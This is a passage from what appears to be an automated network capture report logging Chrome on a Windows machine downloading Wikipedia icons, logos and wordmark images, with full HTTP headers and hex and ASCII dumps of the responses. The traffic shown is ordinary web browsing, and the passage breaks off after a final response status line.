                                                                                                                                                                                                                                      Referer: https://en.wikipedia.org/w/load.php?lang=en&modules=ext.cite.styles%7Cext.uls.interlanguage%7Cext.visualEditor.desktopArticleTarget.noscript%7Cext.wikimediaBadges%7Cext.wikimediamessages.styles%7Cjquery.makeCollapsible.styles%7Cskins.vector.icons%2Cstyles%7Cskins.vector.search.codex.styles%7Cwikibase.client.init&only=styles&skin=vector-2022
                                                                                                                                                                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                      Cookie: WMF-Last-Access=07-Jan-2025; WMF-Last-Access-Global=07-Jan-2025; WMF-DP=41b; GeoIP=US:NY:New_York:40.71:-74.01:v4; NetworkProbeLimit=0.001
                                                                                                                                                                                                                                      2025-01-07 17:52:52 UTC1003INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      date: Tue, 07 Jan 2025 10:34:47 GMT
                                                                                                                                                                                                                                      etag: W/"11c23"
                                                                                                                                                                                                                                      expires: Wed, 05 Feb 2025 11:01:48 GMT
                                                                                                                                                                                                                                      cache-control: public, max-age=2592000, s-maxage=2592000, stale-while-revalidate=60
                                                                                                                                                                                                                                      vary: Accept-Encoding
                                                                                                                                                                                                                                      server: ATS/9.2.6
                                                                                                                                                                                                                                      x-content-type-options: nosniff
                                                                                                                                                                                                                                      content-disposition: inline;filename*=UTF-8''menu.svg
                                                                                                                                                                                                                                      access-control-allow-origin: *
                                                                                                                                                                                                                                      content-type: image/svg+xml
                                                                                                                                                                                                                                      x-cache: cp3072 hit, cp3072 hit/304940
                                                                                                                                                                                                                                      x-cache-status: hit-front
                                                                                                                                                                                                                                      server-timing: cache;desc="hit-front", host;desc="cp3072"
                                                                                                                                                                                                                                      strict-transport-security: max-age=106384710; includeSubDomains; preload
                                                                                                                                                                                                                                      report-to: { "group": "wm_nel", "max_age": 604800, "endpoints": [{ "url": "https://intake-logging.wikimedia.org/v1/events?stream=w3c.reportingapi.network_error&schema_uri=/w3c/reportingapi/network_error/1.0.0" }] }
                                                                                                                                                                                                                                      nel: { "report_to": "wm_nel", "max_age": 604800, "failure_fraction": 0.05, "success_fraction": 0.0}
                                                                                                                                                                                                                                      x-client-ip: 8.46.123.189
                                                                                                                                                                                                                                      age: 0
                                                                                                                                                                                                                                      accept-ranges: bytes
                                                                                                                                                                                                                                      content-length: 221
                                                                                                                                                                                                                                      connection: close
                                                                                                                                                                                                                                      2025-01-07 17:52:52 UTC221INData Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 55 54 46 2d 38 22 3f 3e 0a 3c 73 76 67 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 30 2f 73 76 67 22 20 77 69 64 74 68 3d 22 32 30 22 20 68 65 69 67 68 74 3d 22 32 30 22 20 76 69 65 77 42 6f 78 3d 22 30 20 30 20 32 30 20 32 30 22 3e 3c 74 69 74 6c 65 3e 0a 09 09 6d 65 6e 75 0a 09 3c 2f 74 69 74 6c 65 3e 3c 67 20 66 69 6c 6c 3d 22 23 30 30 30 22 3e 3c 70 61 74 68 20 64 3d 22 4d 31 20 33 76 32 68 31 38 56 33 7a 6d 30 20 38 68 31 38 56 39 48 31 7a 6d 30 20 36 68 31 38 76 2d 32 48 31 7a 22 2f 3e 3c 2f 67 3e 3c 2f 73 76 67 3e 0a
                                                                                                                                                                                                                                      Data Ascii: <?xml version="1.0" encoding="UTF-8"?><svg xmlns="http://www.w3.org/2000/svg" width="20" height="20" viewBox="0 0 20 20"><title>menu</title><g fill="#000"><path d="M1 3v2h18V3zm0 8h18V9H1zm0 6h18v-2H1z"/></g></svg>


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                      45192.168.2.1649772185.15.59.2244436856C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      2025-01-07 17:52:52 UTC1180OUTGET /w/load.php?modules=skins.vector.icons&image=ellipsis&format=original&lang=en&skin=vector-2022&version=11c23 HTTP/1.1
                                                                                                                                                                                                                                      Host: en.wikipedia.org
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                      Origin: https://en.wikipedia.org
                                                                                                                                                                                                                                      sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                      sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                      Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                                                                                                                      Sec-Fetch-Site: same-origin
                                                                                                                                                                                                                                      Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                      Sec-Fetch-Dest: image
                                                                                                                                                                                                                                      Referer: https://en.wikipedia.org/w/load.php?lang=en&modules=ext.cite.styles%7Cext.uls.interlanguage%7Cext.visualEditor.desktopArticleTarget.noscript%7Cext.wikimediaBadges%7Cext.wikimediamessages.styles%7Cjquery.makeCollapsible.styles%7Cskins.vector.icons%2Cstyles%7Cskins.vector.search.codex.styles%7Cwikibase.client.init&only=styles&skin=vector-2022
                                                                                                                                                                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                      Cookie: WMF-Last-Access=07-Jan-2025; WMF-Last-Access-Global=07-Jan-2025; WMF-DP=41b; GeoIP=US:NY:New_York:40.71:-74.01:v4; NetworkProbeLimit=0.001
                                                                                                                                                                                                                                      2025-01-07 17:52:52 UTC1007INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      date: Tue, 07 Jan 2025 06:09:01 GMT
                                                                                                                                                                                                                                      etag: W/"11c23"
                                                                                                                                                                                                                                      expires: Wed, 05 Feb 2025 06:32:17 GMT
                                                                                                                                                                                                                                      cache-control: public, max-age=2592000, s-maxage=2592000, stale-while-revalidate=60
                                                                                                                                                                                                                                      vary: Accept-Encoding
                                                                                                                                                                                                                                      server: ATS/9.2.6
                                                                                                                                                                                                                                      x-content-type-options: nosniff
                                                                                                                                                                                                                                      content-disposition: inline;filename*=UTF-8''ellipsis.svg
                                                                                                                                                                                                                                      access-control-allow-origin: *
                                                                                                                                                                                                                                      content-type: image/svg+xml
                                                                                                                                                                                                                                      x-cache: cp3072 hit, cp3072 hit/420562
                                                                                                                                                                                                                                      x-cache-status: hit-front
                                                                                                                                                                                                                                      server-timing: cache;desc="hit-front", host;desc="cp3072"
                                                                                                                                                                                                                                      strict-transport-security: max-age=106384710; includeSubDomains; preload
                                                                                                                                                                                                                                      report-to: { "group": "wm_nel", "max_age": 604800, "endpoints": [{ "url": "https://intake-logging.wikimedia.org/v1/events?stream=w3c.reportingapi.network_error&schema_uri=/w3c/reportingapi/network_error/1.0.0" }] }
                                                                                                                                                                                                                                      nel: { "report_to": "wm_nel", "max_age": 604800, "failure_fraction": 0.05, "success_fraction": 0.0}
                                                                                                                                                                                                                                      x-client-ip: 8.46.123.189
                                                                                                                                                                                                                                      age: 0
                                                                                                                                                                                                                                      accept-ranges: bytes
                                                                                                                                                                                                                                      content-length: 268
                                                                                                                                                                                                                                      connection: close
                                                                                                                                                                                                                                      2025-01-07 17:52:52 UTC268INData Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 55 54 46 2d 38 22 3f 3e 0a 3c 73 76 67 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 30 2f 73 76 67 22 20 77 69 64 74 68 3d 22 32 30 22 20 68 65 69 67 68 74 3d 22 32 30 22 20 76 69 65 77 42 6f 78 3d 22 30 20 30 20 32 30 20 32 30 22 3e 3c 74 69 74 6c 65 3e 0a 09 09 65 6c 6c 69 70 73 69 73 0a 09 3c 2f 74 69 74 6c 65 3e 3c 67 20 66 69 6c 6c 3d 22 23 30 30 30 22 3e 3c 63 69 72 63 6c 65 20 63 78 3d 22 31 30 22 20 63 79 3d 22 31 30 22 20 72 3d 22 32 22 2f 3e 3c 63 69 72 63 6c 65 20 63 78 3d 22 33 22 20 63 79 3d 22 31 30 22 20 72 3d 22 32 22 2f 3e 3c 63 69 72 63 6c 65 20 63 78 3d 22 31 37 22 20 63 79 3d 22 31 30 22 20 72 3d 22 32 22
                                                                                                                                                                                                                                      Data Ascii: <?xml version="1.0" encoding="UTF-8"?><svg xmlns="http://www.w3.org/2000/svg" width="20" height="20" viewBox="0 0 20 20"><title>ellipsis</title><g fill="#000"><circle cx="10" cy="10" r="2"/><circle cx="3" cy="10" r="2"/><circle cx="17" cy="10" r="2"


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                      46192.168.2.1649771185.15.59.2244436856C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      2025-01-07 17:52:52 UTC544OUTGET /static/images/mobile/copyright/wikipedia-wordmark-en.svg HTTP/1.1
                                                                                                                                                                                                                                      Host: en.wikipedia.org
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                      Accept: */*
                                                                                                                                                                                                                                      Sec-Fetch-Site: none
                                                                                                                                                                                                                                      Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                      Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                      Cookie: WMF-Last-Access=07-Jan-2025; WMF-Last-Access-Global=07-Jan-2025; WMF-DP=41b; GeoIP=US:NY:New_York:40.71:-74.01:v4; NetworkProbeLimit=0.001
                                                                                                                                                                                                                                      2025-01-07 17:52:52 UTC926INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      date: Tue, 07 Jan 2025 15:51:27 GMT
                                                                                                                                                                                                                                      expires: Tue, 06 Jan 2026 21:12:50 GMT
                                                                                                                                                                                                                                      cache-control: max-age=31536000
                                                                                                                                                                                                                                      server: ATS/9.2.6
                                                                                                                                                                                                                                      etag: W/"181a-62309f0dda7c0"
                                                                                                                                                                                                                                      last-modified: Thu, 26 Sep 2024 18:31:03 GMT
                                                                                                                                                                                                                                      access-control-allow-origin: *
                                                                                                                                                                                                                                      content-type: image/svg+xml
                                                                                                                                                                                                                                      vary: Accept-Encoding
                                                                                                                                                                                                                                      age: 7284
                                                                                                                                                                                                                                      x-cache: cp3072 hit, cp3072 hit/287425
                                                                                                                                                                                                                                      x-cache-status: hit-front
                                                                                                                                                                                                                                      server-timing: cache;desc="hit-front", host;desc="cp3072"
                                                                                                                                                                                                                                      strict-transport-security: max-age=106384710; includeSubDomains; preload
                                                                                                                                                                                                                                      report-to: { "group": "wm_nel", "max_age": 604800, "endpoints": [{ "url": "https://intake-logging.wikimedia.org/v1/events?stream=w3c.reportingapi.network_error&schema_uri=/w3c/reportingapi/network_error/1.0.0" }] }
                                                                                                                                                                                                                                      nel: { "report_to": "wm_nel", "max_age": 604800, "failure_fraction": 0.05, "success_fraction": 0.0}
                                                                                                                                                                                                                                      x-client-ip: 8.46.123.189
                                                                                                                                                                                                                                      accept-ranges: bytes
                                                                                                                                                                                                                                      content-length: 6170
                                                                                                                                                                                                                                      connection: close
                                                                                                                                                                                                                                      2025-01-07 17:52:52 UTC6170INData Raw: 3c 73 76 67 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 30 2f 73 76 67 22 20 76 69 65 77 42 6f 78 3d 22 30 20 30 20 31 32 30 20 31 38 22 3e 3c 70 61 74 68 20 66 69 6c 6c 3d 22 23 30 30 30 22 20 66 69 6c 6c 2d 72 75 6c 65 3d 22 6e 6f 6e 7a 65 72 6f 22 20 64 3d 22 6d 31 38 2e 33 33 39 20 30 20 2e 31 39 39 2e 30 30 31 68 2e 33 37 35 6c 2e 31 37 34 2e 30 30 31 68 2e 33 31 35 6c 2e 31 33 38 2e 30 30 31 2e 33 32 33 2e 30 30 31 48 32 30 2e 30 33 34 6c 2e 30 35 38 2e 30 35 33 76 2e 35 63 30 20 2e 31 33 39 2d 2e 30 37 38 2e 32 30 38 2d 2e 32 33 31 2e 32 30 38 2d 2e 37 35 33 2e 30 33 35 2d 2e 39 30 38 2e 31 31 2d 31 2e 31 38 34 2e 35 30 37 2d 2e 31 35 2e 32 31 36 2d 2e 34 34 37 2e 36 38 2d 2e 37 35 35 20 31 2e 32 30 34 4c
                                                                                                                                                                                                                                      Data Ascii: <svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 120 18"><path fill="#000" fill-rule="nonzero" d="m18.339 0 .199.001h.375l.174.001h.315l.138.001.323.001H20.034l.058.053v.5c0 .139-.078.208-.231.208-.753.035-.908.11-1.184.507-.15.216-.447.68-.755 1.204L


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                      47192.168.2.1649770185.15.59.2244436856C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      2025-01-07 17:52:52 UTC1200OUTGET /w/load.php?modules=skins.vector.icons&image=language&variant=progressive&format=original&lang=en&skin=vector-2022&version=11c23 HTTP/1.1
                                                                                                                                                                                                                                      Host: en.wikipedia.org
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                      Origin: https://en.wikipedia.org
                                                                                                                                                                                                                                      sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                      sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                      Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                                                                                                                      Sec-Fetch-Site: same-origin
                                                                                                                                                                                                                                      Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                      Sec-Fetch-Dest: image
                                                                                                                                                                                                                                      Referer: https://en.wikipedia.org/w/load.php?lang=en&modules=ext.cite.styles%7Cext.uls.interlanguage%7Cext.visualEditor.desktopArticleTarget.noscript%7Cext.wikimediaBadges%7Cext.wikimediamessages.styles%7Cjquery.makeCollapsible.styles%7Cskins.vector.icons%2Cstyles%7Cskins.vector.search.codex.styles%7Cwikibase.client.init&only=styles&skin=vector-2022
                                                                                                                                                                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                      Cookie: WMF-Last-Access=07-Jan-2025; WMF-Last-Access-Global=07-Jan-2025; WMF-DP=41b; GeoIP=US:NY:New_York:40.71:-74.01:v4; NetworkProbeLimit=0.001
                                                                                                                                                                                                                                      2025-01-07 17:52:52 UTC1007INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      date: Tue, 07 Jan 2025 07:31:13 GMT
                                                                                                                                                                                                                                      etag: W/"11c23"
                                                                                                                                                                                                                                      expires: Wed, 05 Feb 2025 08:14:41 GMT
                                                                                                                                                                                                                                      cache-control: public, max-age=2592000, s-maxage=2592000, stale-while-revalidate=60
                                                                                                                                                                                                                                      vary: Accept-Encoding
                                                                                                                                                                                                                                      server: ATS/9.2.6
                                                                                                                                                                                                                                      x-content-type-options: nosniff
                                                                                                                                                                                                                                      content-disposition: inline;filename*=UTF-8''language.svg
                                                                                                                                                                                                                                      access-control-allow-origin: *
                                                                                                                                                                                                                                      content-type: image/svg+xml
                                                                                                                                                                                                                                      x-cache: cp3072 hit, cp3072 hit/401931
                                                                                                                                                                                                                                      x-cache-status: hit-front
                                                                                                                                                                                                                                      server-timing: cache;desc="hit-front", host;desc="cp3072"
                                                                                                                                                                                                                                      strict-transport-security: max-age=106384710; includeSubDomains; preload
                                                                                                                                                                                                                                      report-to: { "group": "wm_nel", "max_age": 604800, "endpoints": [{ "url": "https://intake-logging.wikimedia.org/v1/events?stream=w3c.reportingapi.network_error&schema_uri=/w3c/reportingapi/network_error/1.0.0" }] }
                                                                                                                                                                                                                                      nel: { "report_to": "wm_nel", "max_age": 604800, "failure_fraction": 0.05, "success_fraction": 0.0}
                                                                                                                                                                                                                                      x-client-ip: 8.46.123.189
                                                                                                                                                                                                                                      age: 0
                                                                                                                                                                                                                                      accept-ranges: bytes
                                                                                                                                                                                                                                      content-length: 704
                                                                                                                                                                                                                                      connection: close
                                                                                                                                                                                                                                      2025-01-07 17:52:52 UTC704INData Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 55 54 46 2d 38 22 3f 3e 0a 3c 73 76 67 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 30 2f 73 76 67 22 20 77 69 64 74 68 3d 22 32 30 22 20 68 65 69 67 68 74 3d 22 32 30 22 20 76 69 65 77 42 6f 78 3d 22 30 20 30 20 32 30 20 32 30 22 3e 3c 74 69 74 6c 65 3e 0a 09 09 6c 61 6e 67 75 61 67 65 0a 09 3c 2f 74 69 74 6c 65 3e 3c 67 20 66 69 6c 6c 3d 22 23 33 36 63 22 3e 3c 70 61 74 68 20 64 3d 22 4d 32 30 20 31 38 68 2d 31 2e 34 34 61 2e 36 2e 36 20 30 20 30 20 31 2d 2e 34 2d 2e 31 32 2e 38 2e 38 20 30 20 30 20 31 2d 2e 32 33 2d 2e 33 31 4c 31 37 20 31 35 68 2d 35 6c 2d 31 20 32 2e 35 34 61 2e 38 2e 38 20 30 20 30 20 31 2d 2e 32 32 2e
                                                                                                                                                                                                                                      Data Ascii: <?xml version="1.0" encoding="UTF-8"?><svg xmlns="http://www.w3.org/2000/svg" width="20" height="20" viewBox="0 0 20 20"><title>language</title><g fill="#36c"><path d="M20 18h-1.44a.6.6 0 0 1-.4-.12.8.8 0 0 1-.23-.31L17 15h-5l-1 2.54a.8.8 0 0 1-.22.


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                      48192.168.2.1649773185.15.59.2244436856C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      2025-01-07 17:52:52 UTC521OUTGET /static/images/icons/wikipedia.png HTTP/1.1
                                                                                                                                                                                                                                      Host: en.wikipedia.org
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                      Accept: */*
                                                                                                                                                                                                                                      Sec-Fetch-Site: none
                                                                                                                                                                                                                                      Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                      Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                      Cookie: WMF-Last-Access=07-Jan-2025; WMF-Last-Access-Global=07-Jan-2025; WMF-DP=41b; GeoIP=US:NY:New_York:40.71:-74.01:v4; NetworkProbeLimit=0.001
                                                                                                                                                                                                                                      2025-01-07 17:52:52 UTC899INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      date: Mon, 06 Jan 2025 22:14:19 GMT
                                                                                                                                                                                                                                      etag: "3484-62309f0dda7c0"
                                                                                                                                                                                                                                      expires: Mon, 05 Jan 2026 22:44:30 GMT
                                                                                                                                                                                                                                      cache-control: max-age=31536000
                                                                                                                                                                                                                                      server: ATS/9.2.6
                                                                                                                                                                                                                                      last-modified: Thu, 26 Sep 2024 18:31:03 GMT
                                                                                                                                                                                                                                      content-length: 13444
                                                                                                                                                                                                                                      access-control-allow-origin: *
                                                                                                                                                                                                                                      content-type: image/png
                                                                                                                                                                                                                                      age: 70713
                                                                                                                                                                                                                                      x-cache: cp3072 hit, cp3072 hit/816301
                                                                                                                                                                                                                                      x-cache-status: hit-front
                                                                                                                                                                                                                                      server-timing: cache;desc="hit-front", host;desc="cp3072"
                                                                                                                                                                                                                                      strict-transport-security: max-age=106384710; includeSubDomains; preload
                                                                                                                                                                                                                                      report-to: { "group": "wm_nel", "max_age": 604800, "endpoints": [{ "url": "https://intake-logging.wikimedia.org/v1/events?stream=w3c.reportingapi.network_error&schema_uri=/w3c/reportingapi/network_error/1.0.0" }] }
                                                                                                                                                                                                                                      nel: { "report_to": "wm_nel", "max_age": 604800, "failure_fraction": 0.05, "success_fraction": 0.0}
                                                                                                                                                                                                                                      x-client-ip: 8.46.123.189
                                                                                                                                                                                                                                      accept-ranges: bytes
                                                                                                                                                                                                                                      connection: close
                                                                                                                                                                                                                                      2025-01-07 17:52:52 UTC13444INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 64 00 00 00 64 08 06 00 00 00 70 e2 95 54 00 00 00 04 67 41 4d 41 00 00 b1 8f 0b fc 61 05 00 00 34 3b 49 44 41 54 78 01 ec 99 05 54 5b 5d f6 c5 df 5f c6 dd dd dd dd dd dd a7 53 77 57 be ba bb 7b 8b 3b 45 23 44 20 4a 88 12 ac b8 43 02 94 c6 ea f6 b9 c3 99 7d 6e e0 4d 16 f5 96 71 de 5a bf 26 8d bd f7 ee be fb ec 73 2f d2 f8 31 7e 8c 1f e3 c7 f8 31 7e 8c 1f e3 c7 6d 8f c6 c6 c6 97 78 bd d5 7f 72 b9 aa 3e 05 a4 86 86 86 5f 9a cd e6 2f 03 e9 df 8d a4 a4 a4 0f 67 67 e7 2f cb cb 57 a4 e5 17 2a 9b 55 1a cd 2f 81 f4 f7 62 cc 7f d0 ef 1f f8 4e 5b 5b fb 39 b7 db 43 ad 6d ed 67 7c 7e bf df 6a 2b 27 55 b1 e6 1a 90 fe 95 c9 c9 71 bf 3c 29 33 f3 c3 39 39 39 af 07 12 78 79 4e 6e 41 20 37 bf 90 b4 7a 03 15 6b 4b 70
                                                                                                                                                                                                                                      Data Ascii: PNGIHDRddpTgAMAa4;IDATxT[]_SwW{;E#D JC}nMqZ&s/1~1~mxr>_/gg/W*U/bN[[9Cmg|~j+'Uq<)3999xyNnA 7zkKp


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                      49192.168.2.1649775185.15.59.2244436856C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      2025-01-07 17:52:52 UTC1139OUTGET /w/skins/Vector/resources/skins.vector.styles/images/link-external-small-ltr-progressive.svg?fb64d HTTP/1.1
                                                                                                                                                                                                                                      Host: en.wikipedia.org
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                      sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                      sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                      Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                                                                                                                      Sec-Fetch-Site: same-origin
                                                                                                                                                                                                                                      Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                      Sec-Fetch-Dest: image
                                                                                                                                                                                                                                      Referer: https://en.wikipedia.org/w/load.php?lang=en&modules=ext.cite.styles%7Cext.uls.interlanguage%7Cext.visualEditor.desktopArticleTarget.noscript%7Cext.wikimediaBadges%7Cext.wikimediamessages.styles%7Cjquery.makeCollapsible.styles%7Cskins.vector.icons%2Cstyles%7Cskins.vector.search.codex.styles%7Cwikibase.client.init&only=styles&skin=vector-2022
                                                                                                                                                                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                      Cookie: WMF-Last-Access=07-Jan-2025; WMF-Last-Access-Global=07-Jan-2025; WMF-DP=41b; GeoIP=US:NY:New_York:40.71:-74.01:v4; NetworkProbeLimit=0.001
                                                                                                                                                                                                                                      2025-01-07 17:52:52 UTC927INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      date: Mon, 06 Jan 2025 21:39:37 GMT
                                                                                                                                                                                                                                      cache-control: public, s-maxage=31536000, max-age=31536000, immutable
                                                                                                                                                                                                                                      server: ATS/9.2.6
                                                                                                                                                                                                                                      x-content-type-options: nosniff
                                                                                                                                                                                                                                      access-control-allow-origin: *
                                                                                                                                                                                                                                      last-modified: Tue, 17 Dec 2024 04:01:36 GMT
                                                                                                                                                                                                                                      content-type: image/svg+xml
                                                                                                                                                                                                                                      vary: Accept-Encoding
                                                                                                                                                                                                                                      age: 72795
                                                                                                                                                                                                                                      x-cache: cp3072 hit, cp3072 hit/776947
                                                                                                                                                                                                                                      x-cache-status: hit-front
                                                                                                                                                                                                                                      server-timing: cache;desc="hit-front", host;desc="cp3072"
                                                                                                                                                                                                                                      strict-transport-security: max-age=106384710; includeSubDomains; preload
                                                                                                                                                                                                                                      report-to: { "group": "wm_nel", "max_age": 604800, "endpoints": [{ "url": "https://intake-logging.wikimedia.org/v1/events?stream=w3c.reportingapi.network_error&schema_uri=/w3c/reportingapi/network_error/1.0.0" }] }
                                                                                                                                                                                                                                      nel: { "report_to": "wm_nel", "max_age": 604800, "failure_fraction": 0.05, "success_fraction": 0.0}
                                                                                                                                                                                                                                      x-client-ip: 8.46.123.189
                                                                                                                                                                                                                                      accept-ranges: bytes
                                                                                                                                                                                                                                      content-length: 298
                                                                                                                                                                                                                                      connection: close
                                                                                                                                                                                                                                      2025-01-07 17:52:52 UTC298INData Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 55 54 46 2d 38 22 3f 3e 0a 3c 73 76 67 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 30 2f 73 76 67 22 20 77 69 64 74 68 3d 22 31 32 22 20 68 65 69 67 68 74 3d 22 31 32 22 20 76 69 65 77 42 6f 78 3d 22 30 20 30 20 31 32 20 31 32 22 3e 0a 09 3c 74 69 74 6c 65 3e 0a 09 09 65 78 74 65 72 6e 61 6c 20 6c 69 6e 6b 0a 09 3c 2f 74 69 74 6c 65 3e 0a 09 3c 70 61 74 68 20 66 69 6c 6c 3d 22 23 33 36 63 22 20 64 3d 22 4d 36 20 31 68 35 76 35 4c 38 2e 38 36 20 33 2e 38 35 20 34 2e 37 20 38 20 34 20 37 2e 33 6c 34 2e 31 35 2d 34 2e 31 36 7a 4d 32 20 33 68 32 76 31 48 32 76 36 68 36 56 38 68 31 76 32 61 31 20 31 20 30 20 30 20 31 2d 31 20 31
                                                                                                                                                                                                                                      Data Ascii: <?xml version="1.0" encoding="UTF-8"?><svg xmlns="http://www.w3.org/2000/svg" width="12" height="12" viewBox="0 0 12 12"><title>external link</title><path fill="#36c" d="M6 1h5v5L8.86 3.85 4.7 8 4 7.3l4.15-4.16zM2 3h2v1H2v6h6V8h1v2a1 1 0 0 1-1 1


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                      50192.168.2.1649778185.15.59.2404436856C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      2025-01-07 17:52:52 UTC422OUTGET /wikipedia/commons/thumb/0/05/Windows_10_Logo.svg/200px-Windows_10_Logo.svg.png HTTP/1.1
                                                                                                                                                                                                                                      Host: upload.wikimedia.org
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                      Accept: */*
                                                                                                                                                                                                                                      Sec-Fetch-Site: none
                                                                                                                                                                                                                                      Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                      Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                      2025-01-07 17:52:52 UTC1063INHTTP/1.1 200 OK
